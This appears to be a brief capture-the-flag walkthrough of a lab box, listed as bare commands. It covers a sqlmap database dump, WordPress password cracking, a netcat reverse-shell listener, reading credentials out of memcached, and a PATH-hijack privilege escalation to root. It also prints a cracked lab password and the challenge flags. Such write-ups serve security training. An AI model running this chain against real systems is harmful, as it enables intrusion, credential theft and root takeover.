CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;)
Time To Submit The Flags :)
1a26a6d51c0172400add0e297608dec6
f4e788f87cc3afaecbaf0f0fe9ae6ad7
echo "<IP> wekor.thm" | sudo tee -a /etc/hosts
for i in `curl -s http://wekor.thm/robots.txt | grep Disallow | cut -d " " -f2`;do echo $i;curl -I http://wekor.thm$i;echo "---";done
curl -s http://wekor.thm/comingreallysoon/
sqlmap -r it_cart_coupon.xml --dump-all --threads=10
ll
tree wordpress
cat wp_users.csv
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
echo "<IP> site.wekor.thm" | sudo tee -a /etc/hosts
admin: Administrator
wp_eagle: Subscriber
wp_jeffrey: Subscriber
wp_yura: Administrator
nc -nlvp 4444
echo "stats items" | nc -vn -w 1 127.0.0.1 11211
echo "stats cachedump 1 0" | nc -vn -w 1 127.0.0.1 11211
echo "get username" | nc -vn -w 1 127.0.0.1 11211
echo "get password" | nc -vn -w 1 127.0.0.1 11211
Orka:OrkAiSC00L24/7$
su Orka
Password: OrkAiSC00L24/7$
cat /home/Orka/user.txt
sudo -l
./bitcoin
echo $PATH
ls -la /usr/sbin/ | head
cat > /usr/sbin/python << EOF
#!/bin/bash
/bin/bash
EOF
chmod +x /usr/sbin/python
sudo /home/Orka/Desktop/bitcoin
20
cat /root/root.txt